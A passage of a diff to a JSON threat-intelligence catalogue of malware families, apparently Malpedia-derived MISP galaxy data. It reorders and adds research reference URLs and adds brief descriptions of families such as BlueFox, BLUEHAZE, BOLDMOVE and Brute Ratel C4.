+ "https://www.trendmicro.com/en_us/research/22/g/lockbit-ransomware-group-augments-its-latest-variant--lockbit-3-.html",
+ "https://go.recordedfuture.com/hubfs/reports/MTP-2021-0804.pdf",
+ "https://us-cert.cisa.gov/ncas/alerts/aa21-291a",
+ "https://www.mandiant.com/resources/cryptography-blackmatter-ransomware",
+ "https://www.hhs.gov/sites/default/files/demystifying-blackmatter.pdf",
+ "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
+ "https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751",
"https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
"https://www.nozominetworks.com/blog/blackmatter-ransomware-technical-analysis-and-tools-from-nozomi-networks-labs/",
- "https://www.mandiant.com/resources/chasing-avaddon-ransomware",
+ "https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-moves-victims-to-lockbit-after-shutdown/",
"https://www.varonis.com/blog/blackmatter-ransomware/",
"https://therecord.media/blackmatter-ransomware-says-its-shutting-down-due-to-pressure-from-local-authorities/",
- "https://us-cert.cisa.gov/ncas/alerts/aa21-291a",
+ "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://thehackernews.com/2022/04/researchers-connect-blackcat-ransomware.html",
+ "https://therecord.media/darkside-ransomware-gang-moves-some-of-its-bitcoin-after-revil-got-hit-by-law-enforcement/",
+ "https://www.mcafee.com/blogs/enterprise/blackmatter-ransomware-analysis-the-dark-side-returns/",
+ "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/",
+ "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html",
+ "https://twitter.com/GelosSnake/status/1451465959894667275",
+ "https://blog.group-ib.com/blackmatter#",
+ "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
+ "https://www.glimps.fr/lockbit3-0/",
+ "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf",
+ "https://www.mandiant.com/resources/chasing-avaddon-ransomware",
+ "https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/",
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackmatter-data-exfiltration",
"https://blog.group-ib.com/blackmatter2",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/"
+ "https://www.ciphertechsolutions.com/rapidly-evolving-blackmatter-ransomware-tactics/",
+ "https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service",
+ "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
+ "https://www.netskope.com/blog/netskope-threat-coverage-blackmatter",
+ "https://www.youtube.com/watch?v=NIiEcOryLpI",
+ "https://news.sophos.com/en-us/2021/08/09/blackmatter-ransomware-emerges-from-the-shadow-of-darkside/",
+ "https://services.google.com/fh/files/misc/gcat_threathorizons_full_nov2021.pdf",
+ "https://ke-la.com/the-ideal-ransomware-victim-what-attackers-are-looking-for/",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/",
+ "https://www.tesorion.nl/en/posts/analysis-of-the-blackmatter-ransomware/",
+ "https://raw.githubusercontent.com/antonioCoco/infosec-talks/main/InsomniHack_2022_Ransomware_Encryption_Internals.pdf",
+ "https://www.bleepingcomputer.com/news/security/darkside-ransomware-rushes-to-cash-out-7-million-in-bitcoin/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-ransomware-ttps",
+ "https://blog.minerva-labs.com/blackmatter",
+ "https://www.elliptic.co/blog/darkside-bitcoins-on-the-move-following-government-cyberattack-against-revil-ransomware-group",
+ "https://assets.virustotal.com/reports/2021trends.pdf",
+ "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/"
],
"synonyms": [],
"type": []
@@ -14847,13 +15790,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.blacknet_rat",
- "https://labs.k7computing.com/?p=21365",
- "https://github.com/FarisCode511/BlackNET/",
- "https://blog.malwarebytes.com/threat-analysis/2020/03/fake-corona-antivirus-distributes-blacknet-remote-administration-tool/",
- "https://github.com/BlackHacker511/BlackNET/",
"http://www.pwncode.io/2019/12/blacknet-rat-when-you-leave-panel.html",
"https://blog.minerva-labs.com/become-a-vip-victim-with-new-discord-distributed-malware",
- "https://github.com/mave12/BlackNET-3.7.0.1"
+ "https://labs.k7computing.com/?p=21365",
+ "https://github.com/BlackHacker511/BlackNET/",
+ "https://github.com/mave12/BlackNET-3.7.0.1",
+ "https://blog.malwarebytes.com/threat-analysis/2020/03/fake-corona-antivirus-distributes-blacknet-remote-administration-tool/",
+ "https://github.com/FarisCode511/BlackNET/"
],
"synonyms": [],
"type": []
@@ -14879,10 +15822,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.blackpos",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/new-blackpos-malware-emerges-in-the-wild-targets-retail-accounts/",
- "https://usa.visa.com/dam/VCOM/global/support-legal/documents/new-pos-malware-samples.pdf",
"https://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-endangers-in-store-card-payments-and-smbs-worldwide-switches-between-blackpos-and-other-tools/",
- "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf"
+ "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
+ "https://usa.visa.com/dam/VCOM/global/support-legal/documents/new-pos-malware-samples.pdf",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/new-blackpos-malware-emerges-in-the-wild-targets-retail-accounts/"
],
"synonyms": [
"Kaptoxa",
@@ -14900,9 +15843,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.blackremote",
+ "https://news.sophos.com/en-us/2020/05/14/raticate/",
"https://unit42.paloaltonetworks.com/blackremote-money-money-money-a-swedish-actor-peddles-an-expensive-new-rat/",
- "https://unit42.paloaltonetworks.jp/blackremote-money-money-money-a-swedish-actor-peddles-an-expensive-new-rat/",
- "https://news.sophos.com/en-us/2020/05/14/raticate/"
+ "https://unit42.paloaltonetworks.jp/blackremote-money-money-money-a-swedish-actor-peddles-an-expensive-new-rat/"
],
"synonyms": [
"BlackRAT"
@@ -14945,8 +15888,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.blackruby",
- "https://www.bleepingcomputer.com/news/security/black-ruby-ransomware-skips-victims-in-iran-and-adds-a-miner-for-good-measure/",
- "https://www.acronis.com/en-us/blog/posts/black-ruby-combining-ransomware-and-coin-miner-malware"
+ "https://www.acronis.com/en-us/blog/posts/black-ruby-combining-ransomware-and-coin-miner-malware",
+ "https://www.bleepingcomputer.com/news/security/black-ruby-ransomware-skips-victims-in-iran-and-adds-a-miner-for-good-measure/"
],
"synonyms": [],
"type": []
@@ -14959,27 +15902,31 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.blackshades",
- "https://www.secureworks.com/research/threat-profiles/aluminum-saratoga",
"https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-2-blackshades-net/",
- "https://blog.malwarebytes.com/threat-analysis/2014/05/taking-off-the-blackshades/",
+ "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html",
"https://blog.malwarebytes.com/threat-analysis/2012/06/blackshades-in-syria/",
- "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html"
+ "https://blog.malwarebytes.com/threat-analysis/2014/05/taking-off-the-blackshades/",
+ "https://www.secureworks.com/research/threat-profiles/aluminum-saratoga"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "8c3202d5-1671-46ec-9d42-cb50dbe2f667",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "0fb57d46-1c4f-49a3-80c2-05bcaa34ec1b",
"value": "BlackShades"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blacksnake",
+ "https://blog.cyble.com/2023/03/09/blacksnake-ransomware-emerges-from-chaos-ransomwares-shadow/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "366fe903-5ab4-47d3-a0e0-8ff45b2b4a8c",
+ "value": "BlackSnake"
+ },
{
"description": "",
"meta": {
@@ -14998,8 +15945,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.blackworm_rat",
- "https://www.fireeye.com/blog/threat-research/2014/08/connecting-the-dots-syrian-malware-team-uses-blackworm-for-attacks.html",
"https://github.com/BlackHacker511/BlackWorm",
+ "https://www.fireeye.com/blog/threat-research/2014/08/connecting-the-dots-syrian-malware-team-uses-blackworm-for-attacks.html",
"https://www.fidelissecurity.com/threatgeek/archive/down-h-w0rm-hole-houdinis-rat/"
],
"synonyms": [],
@@ -15026,13 +15973,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.blindingcan",
- "https://www.hvs-consulting.de/lazarus-report/",
+ "https://securelist.com/the-lazarus-group-deathnote-campaign/109490/",
"https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf",
"https://www.sentinelone.com/blog/the-blindingcan-rat-and-malicious-north-korean-activity/",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
"https://blogs.jpcert.or.jp/en/2020/09/BLINDINGCAN.html",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-232a",
+ "https://www.welivesecurity.com/2022/09/30/amazon-themed-campaigns-lazarus-netherlands-belgium/",
"https://www.mandiant.com/resources/blog/dprk-whatsapp-phishing",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-232a"
+ "https://www.hvs-consulting.de/lazarus-report/",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf"
],
"synonyms": [
"DRATzarus RAT"
@@ -15048,8 +15997,9 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.blindtoad",
"https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-continues-heists-mounts-attacks-on-financial-organizations-in-latin-america/",
- "https://content.fireeye.com/apt/rpt-apt38",
- "https://baesystemsai.blogspot.com/2017/10/taiwan-heist-lazarus-tools.html"
+ "https://baesystemsai.blogspot.com/2017/10/taiwan-heist-lazarus-tools.html",
+ "https://adeo.com.tr/wp-content/uploads/2020/05/ADEO-Lazarus-APT38.pdf",
+ "https://content.fireeye.com/apt/rpt-apt38"
],
"synonyms": [],
"type": []
@@ -15062,20 +16012,20 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.blister",
- "https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://elastic.github.io/security-research/malware/2022/05/02.blister/article/",
- "https://www.elastic.co/blog/elastic-security-uncovers-blister-malware-campaign",
"https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html",
"https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
- "https://killingthebear.jorgetesta.tech/actors/evil-corp",
+ "https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee",
"https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/d/thwarting-loaders-from-socgholish-to-blisters-lockbit-payload/iocs-thwarting-loaders-socgholish-blister.txt",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/",
- "https://twitter.com/MsftSecIntel/status/1522690116979855360",
"https://www.trendmicro.com/en_no/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html",
+ "https://www.elastic.co/blog/elastic-security-uncovers-blister-malware-campaign",
+ "https://redcanary.com/blog/intelligence-insights-january-2022/",
+ "https://twitter.com/MsftSecIntel/status/1522690116979855360",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/",
+ "https://killingthebear.jorgetesta.tech/actors/evil-corp",
+ "https://elastic.github.io/security-research/malware/2022/05/02.blister/article/",
"https://cloudsek.com/technical-analysis-of-code-signed-blister-malware-campaign-part-2/",
"https://cloudsek.com/technical-analysis-of-code-signed-blister-malware-campaign-part-1/",
- "https://redcanary.com/blog/intelligence-insights-january-2022/"
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself"
],
"synonyms": [
"COLORFAKE"
@@ -15099,13 +16049,42 @@
"uuid": "ecdc0a43-8845-4dc4-a3f0-de2f0142aa4d",
"value": "BloodyStealer"
},
+ {
+ "description": "BlueFox is a .NET infostealer sold on forums as a Maware-as-a-Service. Its capabilities are those of a classic information stealer, with a focus on cryptocurrency wallets, and file grabber and loader capabilities.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bluefox",
+ "https://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar/",
+ "https://blog.sekoia.io/bluefox-information-stealer-traffer-maas/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "f9f5d767-3460-49f3-94c2-5dd91b341505",
+ "value": "BlueFox"
+ },
+ {
+ "description": "Mandiant associates this with UNC4191, this malware is a launcher for NCAT to establish a reverse tunnel.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bluehaze",
+ "https://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "3dcfef7b-d657-4ac5-b738-ef793237274b",
+ "value": "BLUEHAZE"
+ },
{
"description": "Ransomware.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bluesky",
"https://unit42.paloaltonetworks.com/bluesky-ransomware/",
- "https://www.sentinelone.com/blog/bluesky-ransomware-ad-lateral-movement-evasion-and-fast-encryption-puts-threat-on-the-radar/"
+ "https://yoroi.company/research/dissecting-bluesky-ransomware-payload/",
+ "https://www.sentinelone.com/blog/bluesky-ransomware-ad-lateral-movement-evasion-and-fast-encryption-puts-threat-on-the-radar/",
+ "https://cloudsek.com/technical-analysis-of-bluesky-ransomware/"
],
"synonyms": [],
"type": []
@@ -15118,8 +16097,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bluether",
- "https://web.archive.org/web/20200229012206/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf",
- "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf"
+ "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf",
+ "https://web.archive.org/web/20200229012206/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf"
],
"synonyms": [
"CAPGELD"
@@ -15134,12 +16113,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.blustealer",
- "https://blog.minerva-labs.com/a-new-blustealer-loader-uses-direct-syscalls-to-evade-edrs",
"https://twitter.com/GoSecure_Inc/status/1437435265350397957",
- "https://blogs.blackberry.com/en/2021/10/threat-thursday-blustealer-infostealer",
- "https://decoded.avast.io/anhho/blustealer/",
"https://www.gosecure.net/blog/2021/09/22/gosecure-titan-labs-technical-report-blustealer-malware-threat/",
- "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord"
+ "https://blog.minerva-labs.com/a-new-blustealer-loader-uses-direct-syscalls-to-evade-edrs",
+ "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
+ "https://decoded.avast.io/anhho/blustealer/",
+ "https://blogs.blackberry.com/en/2021/10/threat-thursday-blustealer-infostealer"
],
"synonyms": [
"a310logger"
@@ -15180,6 +16159,7 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bobik",
+ "https://www.sentinelone.com/labs/noname05716-the-pro-russian-hacktivist-group-targeting-nato/",
"https://decoded.avast.io/martinchlumecky/bobik/"
],
"synonyms": [],
@@ -15200,6 +16180,20 @@
"uuid": "444ca9d1-7128-40fa-9665-654194dfbe0b",
"value": "Bohmini"
},
+ {
+ "description": "According to Mandiant, this malware family is attributed to potential chinese background and its Linux variant is related to exploitation of Fortinet's SSL-VPN (CVE-2022-42475).",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.boldmove",
+ "https://www.mandiant.com/resources/blog/chinese-actors-exploit-fortios-flaw",
+ "https://thehackernews.com/2023/01/new-chinese-malware-spotted-exploiting.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "4212b386-b6de-4b06-86f1-ba20b5c01447",
+ "value": "BOLDMOVE (Windows)"
+ },
{
"description": "",
"meta": {
@@ -15240,26 +16234,32 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "9ff6e087-6755-447a-b537-8f06c7aa4a85",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "1b8cfb29-7a63-459a-bc90-c9ea3634b21c",
"value": "Bookworm"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.boombox",
+ "https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_nobelium_2022_v1.pdf",
+ "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/",
+ "https://r136a1.info/2022/07/19/a-look-into-apt29s-new-early-stage-google-drive-downloader/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "e8112e1a-4fda-4857-8df8-0ba7fb5ea1ba",
+ "value": "BOOMBOX"
+ },
{
"description": "FireEye describes BOOSTWRITE as a loader crafted to be launched via abuse of the DLL search order of applications which load the legitimate ‘Dwrite.dll’ provided by the Microsoft DirectX Typography Services. The application loads the ‘gdi’ library, which loads the ‘gdiplus’ library, which ultimately loads ‘Dwrite’. Mandiant identified instances where BOOSTWRITE was placed on the file system alongside the RDFClient binary to force the application to import DWriteCreateFactory from it rather than the legitimate DWrite.dll.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.boostwrite",
- "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://www.fireeye.com/blog/threat-research/2019/10/mahalo-fin7-responding-to-new-tools-and-techniques.html"
+ "https://www.fireeye.com/blog/threat-research/2019/10/mahalo-fin7-responding-to-new-tools-and-techniques.html",
+ "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf"
],
"synonyms": [],
"type": []
@@ -15272,8 +16272,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bootwreck",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/new-killdisk-variant-hits-latin-american-financial-organizations-again/",
- "https://content.fireeye.com/apt/rpt-apt38"
+ "https://content.fireeye.com/apt/rpt-apt38",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/new-killdisk-variant-hits-latin-american-financial-organizations-again/"
],
"synonyms": [
"MBRkiller"
@@ -15323,39 +16323,34 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "52d9a474-fc37-48b5-8e39-4394194b9573",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "80487bca-7629-4cb2-bf5b-993d5568b699",
"value": "Bouncer"
},
+ {
+ "description": "According to Checkpoint Research, this malware family has the ability to download and upload files, run commands and send the attackers the results. It has been observed being used by threat actor IndigoZebra.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.boxcaon",
+ "https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "5ccb9d4c-bb9b-48ee-9ea3-a64a81eb210f",
+ "value": "BoxCaon"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bozok",
- "https://securelist.com/apt-trends-report-q1-2021/101967/",
"https://unit42.paloaltonetworks.com/unit42-projectm-link-found-between-pakistani-actor-and-operation-transparent-tribe",
+ "https://securelist.com/apt-trends-report-q1-2021/101967/",
"https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "cff2e174-52b8-4304-903a-012f97d70b7c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "f9d0e934-879c-4668-b959-6bf7bdc96f5d",
"value": "Bozok"
},
@@ -15377,32 +16372,23 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.brambul",
- "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5b9850b9-0fdd-48a9-b595-9234207ae7df&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments",
- "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
- "https://www.us-cert.gov/ncas/alerts/TA18-149A",
- "https://swanleesec.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-1",
- "https://metaswan.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-1",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://swanleesec.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-2",
"https://metaswan.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-2",
+ "https://swanleesec.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-1",
"https://www.us-cert.gov/ncas/analysis-reports/AR18-149A",
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
"https://www.secureworks.com/research/threat-profiles/nickel-academy",
"https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/",
- "https://swanleesec.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-2",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf"
+ "https://www.us-cert.gov/ncas/alerts/TA18-149A",
+ "https://metaswan.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-1",
+ "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5b9850b9-0fdd-48a9-b595-9234207ae7df&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments"
],
"synonyms": [
"SORRYBRUTE"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "4c057ade-6989-11e8-9efd-ab33ed427468",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "d97ae60e-612a-4feb-908a-8c4d32e9d763",
"value": "Brambul"
},
@@ -15485,6 +16471,19 @@
"uuid": "fd4665b8-59b6-427f-a22d-bb3b50e9e176",
"value": "BrittleBush"
},
+ {
+ "description": "According to Mandiant, BROKEYOLK is a .NET downloader that downloads and executes a file from a hard-coded command and control (C2) server. The malware communicates via SOAP (Simple Object Access Protocol) requests using HTTP.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.brokeyolk",
+ "https://www.mandiant.com/media/17826"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "dd19501d-c23e-4a52-8cef-726a8483d6c2",
+ "value": "BROKEYOLK"
+ },
{
"description": "",
"meta": {
@@ -15504,37 +16503,57 @@
"description": "",
"meta": {
"refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.brushaloader",
- "https://www.proofpoint.com/us/threat-insight/post/brushaloader-still-sweeping-victims-one-year-later",
- "https://www.cert.pl/en/news/single/brushaloader-gaining-new-layers-like-a-pro/",
- "https://blog.talosintelligence.com/2019/02/combing-through-brushaloader.html"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bruh_wiper",
+ "https://www.fortinet.com/blog/threat-research/the-year-of-the-wiper"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "e1ca79ea-5628-4266-bb36-3892c7126ef4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
- "uuid": "75a03c4f-8a97-4fc0-a69e-b2e73e4564fc",
- "value": "BrushaLoader"
+ "uuid": "33b76b3f-7056-4892-a134-6e984f500c3c",
+ "value": "Bruh Wiper"
},
{
"description": "",
"meta": {
"refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.brute_ratel_c4",
- "https://unit42.paloaltonetworks.com/brute-ratel-c4-tool/",
- "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.brushaloader",
+ "https://www.proofpoint.com/us/threat-insight/post/brushaloader-still-sweeping-victims-one-year-later",
+ "https://blog.talosintelligence.com/2019/02/combing-through-brushaloader.html",
+ "https://www.cert.pl/en/news/single/brushaloader-gaining-new-layers-like-a-pro/"
],
"synonyms": [],
"type": []
},
+ "uuid": "75a03c4f-8a97-4fc0-a69e-b2e73e4564fc",
+ "value": "BrushaLoader"
+ },
+ {
+ "description": "Brute Ratel is a a Customized Command and Control Center for Red Team and Adversary Simulation\r\n\r\nSMB and TCP payloads provide functionality to write custom external C2 channels over legitimate websites such as Slack, Discord, Microsoft Teams and more.\r\nBuilt-in debugger to detect EDR userland hooks.\r\nAbility to keep memory artifacts hidden from EDRs and AV.\r\nDirect Windows SYS calls on the fly.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.brute_ratel_c4",
+ "https://medium.com/walmartglobaltech/brute-ratel-config-decoding-update-7820455022cb",
+ "https://unit42.paloaltonetworks.com/brute-ratel-c4-tool/",
+ "https://0xdarkvortex.dev/hiding-in-plainsight/",
+ "https://protectedmo.de/brute.html",
+ "https://twitter.com/embee_research/status/1580030303950995456?s=20&t=0vfXnrCXaVSX-P-hiSrFwA",
+ "https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f",
+ "https://www.mdsec.co.uk/2022/08/part-3-how-i-met-your-beacon-brute-ratel/",
+ "https://web.archive.org/web/20230216110153/https://yoroi.company/research/hunting-cyber-evil-ratels-from-the-targeted-attacks-to-the-widespread-usage-of-brute-ratel/",
+ "https://0xdarkvortex.dev/proxying-dll-loads-for-hiding-etwti-stack-tracing/",
+ "https://www.youtube.com/watch?v=a7W6rhkpVSM",
+ "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
+ "https://andreafortuna.org/2023/02/23/how-to-detect-brute-ratel-activities",
+ "https://blog.spookysec.net/analyzing-brc4-badgers/",
+ "https://socradar.io/brute-ratel-utilized-by-threat-actors-in-new-ransomware-operations/",
+ "https://bruteratel.com/research/feature-update/2021/06/01/PE-Reflection-Long-Live-The-King/",
+ "https://www.splunk.com/en_us/blog/security/deliver-a-strike-by-reversing-a-badger-brute-ratel-detection-and-analysis.html"
+ ],
+ "synonyms": [
+ "BruteRatel"
+ ],
+ "type": []
+ },
"uuid": "19e4df44-d469-4903-8999-22d650a21dd7",
"value": "Brute Ratel C4"
},
@@ -15557,9 +16576,9 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bs2005",
"https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/",
- "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-palace",
"https://github.com/nccgroup/Royal_APT",
- "https://www.secureworks.com/research/threat-profiles/bronze-palace"
